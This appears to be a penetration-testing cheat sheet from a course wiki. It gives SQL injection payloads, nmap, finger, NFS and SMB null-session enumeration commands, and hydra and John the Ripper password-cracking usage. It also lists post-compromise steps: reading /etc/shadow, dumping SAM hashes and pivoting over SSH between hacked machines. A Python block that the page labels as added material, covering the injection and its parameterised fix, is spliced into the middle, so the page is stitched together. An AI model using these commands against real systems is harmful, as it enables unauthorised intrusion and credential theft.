Don't forget to use data collected from previously hacked machines.

  • Passwords
  • Try to exploit trust relationships between machines: ssh from one hacked machine to another.

Ports Associated with Known Vulnerabilities

Books24x7 (ISSAIC)

SQL Injection

'or 1=1--

'; if user ='dbo' waitfor delay '0:0:5 '--
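The first payload above works because the leading quote closes the string literal the application built around the username and `--` comments out the remainder of the WHERE clause. The following is an added Python example (not from the original page) with a constructed in-memory SQLite table: the vulnerable concatenated query next to the parameterised fix, both run against that payload.

```python
import sqlite3

# The page's first payload, supplied as the "username" field of a login form.
PAYLOAD = "'or 1=1--"


def make_db():
    """Constructed demo data (not from the page): two accounts in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("yoda", "correct-horse"), ("chewbacca", "wookiee1")])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: attacker input is parsed as SQL syntax.
    With PAYLOAD the statement becomes
      ... WHERE username = ''or 1=1--' AND password = '...'
    so the password check is commented away and every row matches."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return [row[0] for row in conn.execute(sql)]


def login_hardened(conn, username, password):
    """Parameterised query: the driver binds the values as data, so the
    quote and comment sequence in PAYLOAD are just characters in a string
    that matches no account."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def demo():
    """Run the same four logins through both versions and return the rows."""
    conn = make_db()
    return {
        "vuln_legit": login_vulnerable(conn, "yoda", "correct-horse"),
        "vuln_injected": login_vulnerable(conn, PAYLOAD, "anything"),
        "hard_legit": login_hardened(conn, "yoda", "correct-horse"),
        "hard_injected": login_hardened(conn, PAYLOAD, "anything"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} -> {rows}")
```

The time-based payload on the second line (`waitfor delay`) is Microsoft SQL Server syntax and has no SQLite equivalent, but it fails in the same way against the parameterised query.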


nmap -sV -PN -n -p1- --reason -oN nmap_services.txt <ip range>
nmap -sS -PN -n -p1- -T4 --reason <ip range> -oN nmap_full.txt
nmap -sU -PN -n -F --reason -oN nmap_udp.txt <ip range>


Finger - Shows what users are on a machine

finger @<host>
finger yoda@<host>
finger -b -p chewbacca


SMTP

  • Can be used to identify user accounts
    • VRFY
    • EXPN


rpcinfo -p <computer name>
If NFS and MOUNTD are present:
showmount -e <computer name>
mount <computer name>:/ /mnt

Vulnerable Services

  • SSH
    • OpenSSH <2.3.0
    • SSH 1.2.24-1.2.31

After getting access:

  • Check /etc/passwd
  • Check /etc/shadow
  • Check web server folder
  • Check history file for passwords


Common Windows Vulnerabilities

Windows Services Typically Targeted by Enumeration Attacks

Port          Service
TCP 53        DNS zone transfer
TCP 135       Microsoft RPC Endpoint Mapper
UDP 137       NetBIOS Name Service (NBNS)
TCP 139       NetBIOS session service (SMB over NetBIOS)
TCP 445       SMB over TCP (Direct Host)
UDP 161       Simple Network Management Protocol (SNMP)
TCP/UDP 389   Lightweight Directory Access Protocol (LDAP)
TCP/UDP 3268  Global Catalog Service
TCP 3389      Terminal Services

Windows NET commands

After getting access:

  • Check Documents and Settings folder
  • Use Meterpreter to pull SAM file hashes
  • Use hydra to run dictionary attack against SMB

C:\>whoami /user /groups

The SAM makes up one of the five Registry hives and is implemented in the file %systemroot%\system32\config\sam.

SMB Enumeration

Assuming TCP port 139 or 445 is shown listening by a previous port scan:

C:\>net use \\<ip>\IPC$ "" /u:""
The command completed successfully.

From a Win XP command prompt:

  • NET VIEW \\ip-address
    • Fails
  • NET USE \\ip-address\IPC$ "" /u:""
    • Creates the null session (Username="" Password="")
  • NET VIEW \\ip-address
    • Works now

This syntax connects to the hidden interprocess communications “share” (IPC$) at the target IP address as the built-in anonymous user (/u:"") with a null ("") password. If successful, the attacker now has an open channel over which to attempt all the various techniques outlined in the rest of this section to pillage as much information as possible from the target: network information, shares, users, groups, Registry keys, and so on.


C:\>net use \\<ip>\ipc$ password /u:domain\Administrator

SMB Tools

One of the best tools for enumerating Windows systems is DumpSec.

Another great enumeration tool written by Sir Dystic, called nete (NetE), will extract a wealth of information from a null session connection. We like to use the /0 switch to perform all checks.

Web Servers

  • Run nikto against web server
  • Make sure you run nmap -sV to find a hidden web server
  • Try the .htaccess/.htpasswd files
  • Check source of each page
  • Most likely there's a SQL injection on a login box
  • Don't forget ../../ attacks

Password Cracking


Hydra v5.4 [] (c) 2006 by van Hauser / THC

Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm] imap[-ntlm] 
smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd

OPT some service modules need special input (see README!)

John the Ripper

john -w=/user/student1/tools/wordlists/wordlist file_to_be_cracked

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.